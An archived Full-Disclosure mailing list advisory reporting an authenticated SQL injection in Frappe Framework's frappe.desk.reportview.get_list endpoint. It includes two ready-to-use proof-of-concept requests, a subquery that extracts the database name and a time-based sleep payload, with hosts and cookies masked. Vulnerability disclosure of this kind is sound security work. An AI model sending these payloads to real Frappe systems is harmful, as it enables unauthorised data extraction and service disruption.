lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <2D44FEA4-617A-4CDB-AFA0-E65D8B9746C8@gmail.com> Date: Tue, 27 May 2025 17:04:14 -0400 From: Ron E <ronaldjedgerson@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause. Sample Structured Query Language Injection: Request: GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2 Host: --host-- Cookie: ****** --snip-- Response: HTTP/2 200 OK {"message":[{"salary_component_abbr":"H***","current_db":"_**************"}, --snip-- Time based attack: Request GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2 Host: --host-- Cookie: ****** --snip-- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists